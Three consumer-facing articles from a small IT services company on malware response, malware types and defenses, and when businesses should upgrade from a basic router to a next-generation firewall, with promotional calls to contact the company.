Step‑by‑Step Response If You Suspect Malware

  1. Update definitions – Ensure both AV and antispyware engines have the latest signature database.
  2. Run a full system scan – Allow the scan to complete; it may take 30 minutes to several hours depending on data size.
  3. Follow the removal instructions – Quarantine or delete the identified items, then reboot if prompted.
  4. Re‑scan – After the reboot, run another full scan to confirm the system is clean.
  5. Check startup items & scheduled tasks – Use msconfig (Windows) or systemctl (Linux) to verify nothing suspicious is set to launch automatically.
  6. Change passwords – If you suspect credential theft, reset passwords on a clean device, especially for email, banking, and admin accounts.
  7. Restore from backup (if needed) – If the infection cannot be fully removed, revert to a known‑good backup.

When Professional Help Is Needed

If the malware persists after multiple scans, re‑appears after a reboot, or has caused system instability, you should consult a qualified IT service provider. PSA Computer Services offers a **“no‑fix, no‑pay” guarantee** – you only pay for successful remediation.

Best‑Practice Checklist

  • Enable built‑in Windows Defender (or a reputable third‑party solution) with real‑time protection.
  • Keep OS and all applications patched – enable automatic updates.
  • Schedule weekly full scans and daily definition updates.
  • Use a hardware or software firewall with inbound blocking and outbound monitoring.
  • Practice safe browsing: avoid unknown links, verify SSL certificates, and use a reputable browser.
  • Back up critical data using the 3‑2‑1‑0 rule; test restore procedures quarterly.
  • Enable multi‑factor authentication on all cloud accounts.

Bottom Line

No home or business should operate without a modern, regularly updated antivirus/antispyware solution and a firewall. One well‑maintained product, coupled with common‑sense habits (patching, backups, MFA), provides strong protection without the performance penalties and conflicts of running multiple overlapping tools.

Need a Reliable Antivirus Solution or a Clean‑Up?

Call PSA Computer Services at (707) 506‑6228 for a free assessment, installation, or infection remediation. We’ll get you protected quickly and affordably.

Introduction to Malicious Software

by Billy J Long Guidance, PSA Articles

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million + malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., SolarWinds, Accellion).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypt files and demand payment; modern variants (e.g., LockBit 2.0, Hive) include “double‑extortion” – stealing data and threatening public release.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Execute malicious code directly in memory using legitimate OS tools (PowerShell, WMI, Cobalt Strike). No files are written to disk, making traditional AV signatures less effective.

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule. Verify backups quarterly and store at least one copy immutable.
  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and DNS‑filtering services (e.g., Quad9, Cloudflare DNS‑SEC) add another layer of defense.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread.
  2. Update your AV/EDR definitions and run a full system scan (not just a quick/real‑time scan).
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot in Safe Mode (Windows) or Recovery mode (macOS) if the malware persists.
  5. Change passwords on a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.

Further Reading

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

When to Upgrade Your Security – Four Key Considerations

by Billy J Long Guidance, PSA Articles

Article (PSA‑0002‑C)

Below is a plain‑language breakdown of the four situations that typically justify moving beyond a basic home‑router firewall to a more capable solution such as a commercial next‑generation firewall (NGFW), unified‑threat‑management platform, or a managed security service.

1️⃣ You run a small business with multiple endpoints and need centralized management

  • What it means – You have 5 – 20 devices (PCs, laptops, printers, VoIP phones, servers) spread across one or more locations.
  • Why a basic firewall falls short – Each device must be configured manually, creating a high risk of “policy drift” where some machines stay open to the Internet.
  • What you need from a new solution
    • A single management console (cloud‑based or on‑prem) that can push policies, updates, and patches to every endpoint.
    • Policy templates that apply the same rule set to all devices automatically.
    • Device‑aware logging that ties every event to a hostname, MAC address, or user for easy forensics.

2️⃣ Ransomware or phishing attacks are a frequent threat in your industry

  • What it means – Malicious PDFs, Office documents, or links that deliver ransomware; fake login pages that harvest credentials.
  • Why a simple firewall can’t stop it – Basic NAT/firewall only looks at IP/port; it can’t inspect file payloads or block a phishing URL that resolves correctly.
  • What you need from a more robust platform
    • Content‑inspection and sandboxing – unknown files are executed in a safe VM before delivery.
    • URL and web‑reputation filtering to block known phishing domains in real time.
    • Network segmentation/micro‑segmentation so an infected workstation can’t reach every other device.
    • EDR integration to stop ransomware processes on the endpoint and auto‑rollback changes.

3️⃣ You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs

  • What it means
    • Allow Zoom video but block Zoom file‑sharing.
    • Detect and block known exploit attempts (e.g., EternalBlue).
    • Provide encrypted, MFA‑protected VPN tunnels for remote staff.
  • Why standard NAT routers can’t deliver
    • Home routers only see TCP/UDP ports – they can’t differentiate between applications that share the same port.
    • No built‑in IDS/IPS signatures, so exploits go unnoticed.
    • VPN support is often old PPTP/L2TP and lacks MFA or split‑tunnel control.
  • What a modern NGFW (or complementary appliance) offers
    • App‑ID/DPI – precise, per‑application policies (allow, limit, or block).
    • Signature‑based IPS plus behavioral analytics for zero‑day protection.
    • Modern SSL/TLS or IPsec VPN with MFA, client certificates, and detailed session logging.
    • Optional ZTNA layer for identity‑based, context‑aware access.

4️⃣ You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls

  • HIPAA – audit logs, encryption, role‑based access for ePHI
    • How a basic firewall fails: No immutable logs, no enforced TLS for internal traffic, no RBAC for rule changes.
    • Required capabilities:
      • Detailed, tamper‑proof audit logging (forwarded to a SIEM or immutable storage).
      • TLS/SSL inspection and encryption enforcement for any traffic containing PHI.
      • RBAC so only authorized staff can modify firewall policies.
  • PCI‑DSS – segmentation, IDS/IPS, strict firewall configuration
    • How a basic firewall fails: No VLAN‑based segmentation, no IDS/IPS, and no change‑management logs.
    • Required capabilities:
      • Network segmentation (separate CHD zone) with firewall rules that isolate card‑holder data.
      • Built‑in IDS/IPS to detect attacks against payment‑card servers.
      • Change‑management logging for every rule alteration.
  • GDPR – data‑loss prevention, breach‑notification readiness, encryption
    • How a basic firewall fails: No outbound data‑filtering, no guaranteed encryption, limited visibility for breach forensics.
    • Required capabilities:
      • DLP or outbound filtering to prevent accidental export of personal data.
      • Enforced TLS for all traffic that could carry EU personal data.
      • Comprehensive logging to meet the 72‑hour breach‑notification window.

How to Act on These Considerations

  • Multiple devices? Deploy a centralized endpoint‑protection platform (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone) and pair it with a lightweight NGFW (FortiGate 60F, Palo Alto PA‑220).
  • Ransomware/phishing frequent? Add sandboxing, URL filtering, and network segmentation; enable EDR on all endpoints.
  • Need app‑aware control, IDS/IPS, VPN? Choose an NGFW that bundles those services or combine a dedicated VPN concentrator with a separate IDS/IPS sensor.
  • Regulatory compliance required? Verify the firewall is certified for PCI‑DSS/HIPAA, enable immutable logging, TLS inspection, and RBAC. Consider a managed security service that handles audit‑ready reporting.

Need a Tailored Recommendation?

If any of the four triggers above sound familiar, it’s time to move beyond a consumer‑grade router. PSA Computer Services can evaluate your environment, recommend a solution that fits your budget, and handle the deployment so you can focus on your business.

Call us today at (707) 506‑6802 for an assessment and a roadmap to a more secure network.